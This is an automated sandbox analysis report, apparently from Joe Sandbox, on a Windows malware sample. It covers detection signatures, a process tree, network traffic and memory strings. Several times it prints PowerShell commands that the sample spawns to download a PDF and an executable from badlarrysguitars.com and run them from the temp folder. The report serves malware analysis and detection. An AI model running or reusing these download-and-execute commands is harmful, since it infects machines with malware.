Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lg1wwLsmCX.exe

Overview

General Information

Sample name:lg1wwLsmCX.exe
renamed because original name is a hash value
Original sample name:aa278fedf75ca629997113488d789e91f73a275575c22194c7bf7d59b30c9bc9.exe
Analysis ID:1570132
MD5:1ceb5d0cb063290c1f66fccfed96a220
SHA1:09b735e87dd4ef4917d2e1bcd969408c3ac099fd
SHA256:aa278fedf75ca629997113488d789e91f73a275575c22194c7bf7d59b30c9bc9
Tags:badlarrysguitars-comexeuser-JAMESWT_MHT
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Machine Learning detection for sample
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • lg1wwLsmCX.exe (PID: 7712 cmdline: "C:\Users\user\Desktop\lg1wwLsmCX.exe" MD5: 1CEB5D0CB063290C1F66FCCFED96A220)
    • powershell.exe (PID: 7740 cmdline: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf") MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Acrobat.exe (PID: 8088 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 4028 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 3472 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1768,i,14827826412355596552,2148674683166230216,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • powershell.exe (PID: 9188 cmdline: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe") MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 9196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7304 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), CommandLine: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lg1wwLsmCX.exe", ParentImage: C:\Users\user\Desktop\lg1wwLsmCX.exe, ParentProcessId: 7712, ParentProcessName: lg1wwLsmCX.exe, ProcessCommandLine: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), ProcessId: 7740, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), CommandLine: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lg1wwLsmCX.exe", ParentImage: C:\Users\user\Desktop\lg1wwLsmCX.exe, ParentProcessId: 7712, ParentProcessName: lg1wwLsmCX.exe, ProcessCommandLine: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), ProcessId: 7740, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), CommandLine: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lg1wwLsmCX.exe", ParentImage: C:\Users\user\Desktop\lg1wwLsmCX.exe, ParentProcessId: 7712, ParentProcessName: lg1wwLsmCX.exe, ProcessCommandLine: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), ProcessId: 7740, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7304, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.3% probability
Source: lg1wwLsmCX.exeJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 101.99.75.174:443 -> 192.168.2.10:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 101.99.75.174:443 -> 192.168.2.10:49806 version: TLS 1.2
Source: Binary string: softy.pdb source: powershell.exe, 00000010.00000002.1841523083.000002BB1BD6E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.1842069784.000002BB1BE05000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Management.resourcesn.pdb^ source: powershell.exe, 00000010.00000002.1841523083.000002BB1BD81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb6 source: powershell.exe, 00000010.00000002.1841523083.000002BB1BD81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rlib.pdb source: powershell.exe, 00000010.00000002.1842069784.000002BB1BE05000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: Joe Sandbox ViewIP Address: 54.224.241.105 54.224.241.105
Source: Joe Sandbox ViewASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /share/alert.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: badlarrysguitars.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01x-adobe-uuid: 79164422-1e43-4f8b-9b29-d5ef60e753c7x-adobe-uuid-type: visitorIdx-api-key: AdobeReader9sec-ch-ua-platform: "Windows"Origin: https://rna-resource.acrobat.comAccept-Language: en-US,en;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, br
Source: global trafficHTTP traffic detected: GET /private/nois.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: badlarrysguitars.comConnection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 54.224.241.105
Source: unknownTCP traffic detected without corresponding DNS query: 54.224.241.105
Source: unknownTCP traffic detected without corresponding DNS query: 54.224.241.105
Source: unknownTCP traffic detected without corresponding DNS query: 54.224.241.105
Source: unknownTCP traffic detected without corresponding DNS query: 54.224.241.105
Source: unknownTCP traffic detected without corresponding DNS query: 54.224.241.105
Source: unknownTCP traffic detected without corresponding DNS query: 54.224.241.105
Source: unknownTCP traffic detected without corresponding DNS query: 54.224.241.105
Source: unknownTCP traffic detected without corresponding DNS query: 54.224.241.105
Source: unknownTCP traffic detected without corresponding DNS query: 54.224.241.105
Source: unknownTCP traffic detected without corresponding DNS query: 54.224.241.105
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /share/alert.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: badlarrysguitars.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01x-adobe-uuid: 79164422-1e43-4f8b-9b29-d5ef60e753c7x-adobe-uuid-type: visitorIdx-api-key: AdobeReader9sec-ch-ua-platform: "Windows"Origin: https://rna-resource.acrobat.comAccept-Language: en-US,en;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, br
Source: global trafficHTTP traffic detected: GET /private/nois.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: badlarrysguitars.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: badlarrysguitars.com
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: powershell.exe, 00000005.00000002.1646173609.000001FDB4BDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781877654.000002B303E97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://badlarrysguitars.com
Source: lg1wwLsmCX.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: lg1wwLsmCX.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: lg1wwLsmCX.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: lg1wwLsmCX.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000005.00000002.1665596061.000001FDCB66C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micronW
Source: svchost.exe, 00000009.00000002.3011261258.0000028FC0A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: lg1wwLsmCX.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: lg1wwLsmCX.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: lg1wwLsmCX.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: lg1wwLsmCX.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: lg1wwLsmCX.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.9.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000005.00000002.1661276426.000001FDC3323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1661276426.000001FDC3466000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1646173609.000001FDB4CB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1828727225.000002B3125E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1828727225.000002B312727000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: lg1wwLsmCX.exeString found in binary or memory: http://ocsp.digicert.com0
Source: lg1wwLsmCX.exeString found in binary or memory: http://ocsp.digicert.com0A
Source: lg1wwLsmCX.exeString found in binary or memory: http://ocsp.digicert.com0C
Source: lg1wwLsmCX.exeString found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000010.00000002.1781877654.000002B3027A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1646173609.000001FDB32B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781877654.000002B302571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000002.1781877654.000002B3027A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lg1wwLsmCX.exeString found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000005.00000002.1665556842.000001FDCB4E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: 2D85F72862B55C4EADD9E66E06947F3D0.8.drString found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000005.00000002.1646173609.000001FDB32B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781877654.000002B302571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.1646173609.000001FDB4444000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781877654.000002B3036FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://badlarrysguitars.com
Source: powershell.exe, 00000010.00000002.1781877654.000002B303EC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://badlarrysguitars.com/pri
Source: lg1wwLsmCX.exeString found in binary or memory: https://badlarrysguitars.com/private/nois.exe
Source: powershell.exe, 00000010.00000002.1780240680.000002B300650000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781632613.000002B3009A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781527537.000002B300900000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1840770157.000002B31B0F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1780240680.000002B3006E2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1842632807.000002BB1BE2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://badlarrysguitars.com/private/nois.exe-OutFile(Join-Path(
Source: lg1wwLsmCX.exeString found in binary or memory: https://badlarrysguitars.com/share/alert.pdf
Source: powershell.exe, 00000005.00000002.1645720630.000001FDB14C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1645586241.000001FDB13E2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1645545243.000001FDB1370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1665596061.000001FDCB66C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1646033280.000001FDB15D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://badlarrysguitars.com/share/alert.pdf-OutFile(Join-Path(
Source: powershell.exe, 00000005.00000002.1646173609.000001FDB4444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://badlarrysguitars.comp
Source: powershell.exe, 00000010.00000002.1828727225.000002B312727000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000010.00000002.1828727225.000002B312727000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000010.00000002.1828727225.000002B312727000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000009.00000003.1360100090.0000028FC0C50000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: powershell.exe, 00000010.00000002.1781877654.000002B3027A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.1646173609.000001FDB4444000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781877654.000002B3036FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000005.00000002.1661276426.000001FDC3323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1661276426.000001FDC3466000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1646173609.000001FDB4CB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1828727225.000002B3125E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1828727225.000002B312727000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: ReaderMessages.7.drString found in binary or memory: https://www.adobe.co
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownHTTPS traffic detected: 101.99.75.174:443 -> 192.168.2.10:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 101.99.75.174:443 -> 192.168.2.10:49806 version: TLS 1.2
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: lg1wwLsmCX.exeStatic PE information: invalid certificate
Source: classification engineClassification label: mal52.winEXE@23/48@2/3
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9196:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vj1mtrgc.vzq.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\lg1wwLsmCX.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\lg1wwLsmCX.exe "C:\Users\user\Desktop\lg1wwLsmCX.exe"
Source: C:\Users\user\Desktop\lg1wwLsmCX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1768,i,14827826412355596552,2148674683166230216,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Users\user\Desktop\lg1wwLsmCX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")
